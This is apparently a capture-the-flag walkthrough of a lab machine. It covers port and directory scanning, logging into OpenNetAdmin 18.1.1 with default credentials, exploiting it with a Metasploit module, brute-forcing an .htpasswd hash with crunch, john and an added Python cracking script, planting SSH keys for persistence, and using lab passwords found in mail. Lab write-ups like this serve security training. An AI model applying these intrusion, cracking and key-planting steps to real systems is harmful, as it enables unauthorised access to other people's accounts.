Scan the host with nmap -A -T4 -p- 192.168.1.2 -vv (all TCP ports, with service/version detection and default scripts).
Dirb scan: dirb http://192.168.1.2 /usr/share/dirb/wordlists/big.txt
robots.txt lists an /ona path. The application there logs you in as guest by default, but the default credentials admin:admin also work. The About page shows it is running OpenNetAdmin 18.1.1, for which searchsploit returns exploit 47772.rb (a Metasploit module).
Copy the module into your local Metasploit module tree (under ~/.msf4/modules/exploits/) so Metasploit can load it, start msfconsole, run reload_all, then use the module against the target.
Looking around, I found a .htpasswd file in /var/www with the following entry:
So what we have is a username, douglas, and a password hash. The password is 10 characters long and built only from the letters a, e, f, h, r, t, so we can generate the whole keyspace with crunch (6^10 = 60,466,176 candidates) and feed it to john.
crunch 10 10 aefhrt > rockyou.txt
Then run: john --wordlist=/root/rockyou.txt thehash.txt
It cracks: the password is fatherrrrr. Now we log in as douglas.
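What crunch and john do in that step is mechanical: enumerate every string of the given length over the charset, hash each one the same way the .htpasswd file does, and compare. The script below is an added example, not code from the original walkthrough, and it makes two assumptions: the entry uses Apache's unsalted {SHA} scheme (the real file's hash format is not shown above; john detects apr1/crypt/bcrypt automatically), and the demo password is the constructed value earth (5 characters from the same letters) rather than the 10-character fatherrrrr, so the full keyspace (6^5 = 7776 candidates) runs in well under a second.

```python
import base64
import hashlib
import itertools
from typing import Iterable, Iterator, Optional, Tuple

# Constructed sample entry for the demo; the real .htpasswd line on the box is
# not reproduced here. Apache's {SHA} scheme is base64(SHA-1(password)), unsalted.
def sha_htpasswd(password: str) -> str:
    raw = hashlib.sha1(password.encode()).digest()
    return "{SHA}" + base64.b64encode(raw).decode()

HTPASSWD_LINE = "douglas:" + sha_htpasswd("earth")   # assumed demo password "earth"


def crunch(min_len: int, max_len: int, charset: str) -> Iterator[str]:
    """Yield every string of length min_len..max_len over charset, in the
    same lexicographic order `crunch min max charset` writes to its output."""
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def parse_htpasswd_line(line: str) -> Tuple[str, str]:
    """Split 'user:digest' and reject malformed lines."""
    user, sep, digest = line.strip().partition(":")
    if not sep or not user or not digest:
        raise ValueError("malformed htpasswd entry: %r" % line)
    return user, digest


def crack_sha_entry(digest: str, candidates: Iterable[str]) -> Tuple[Optional[str], int]:
    """Try each candidate against a {SHA} digest.
    Returns (password, candidates_tried) or (None, candidates_tried)."""
    if not digest.startswith("{SHA}"):
        raise ValueError("only the unsalted {SHA} scheme is handled here; "
                         "use john for apr1/crypt/bcrypt entries")
    target = base64.b64decode(digest[len("{SHA}"):])
    tries = 0
    for cand in candidates:
        tries += 1
        # Unsalted scheme, so one SHA-1 per candidate and a constant-length compare.
        if hashlib.sha1(cand.encode()).digest() == target:
            return cand, tries
    return None, tries


def demo() -> Tuple[str, Optional[str], int]:
    """Mirror the walkthrough step: fixed length, charset aefhrt, crack the entry."""
    user, digest = parse_htpasswd_line(HTPASSWD_LINE)
    password, tries = crack_sha_entry(digest, crunch(5, 5, "aefhrt"))
    return user, password, tries


if __name__ == "__main__":
    user, password, tries = demo()
    print("user=%s password=%s after %d candidates" % (user, password, tries))
```

Generating the candidates lazily instead of writing them to disk is the main difference from the crunch-to-file-then-john approach above: for the real 10-character keyspace that file is about 60 million lines, which is fine on a lab box but worth knowing before you redirect it into a small /root.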
Now we have two similar ways to deal with this: either copy our own id_rsa.pub to the host and append it to jen's ~/.ssh/authorized_keys, or append douglas's existing id_rsa.pub there and log in as jen with his key. Either way, jen's ~/.ssh must stay mode 700 and authorized_keys mode 600, or sshd's StrictModes check will ignore the key.
I found mail in /var/mail addressed to jen.
It gives a new user, moss, with the password Fire!Fire!
We log into moss's account, and in his home directory there is a .games folder; inside it is an executable file we can run.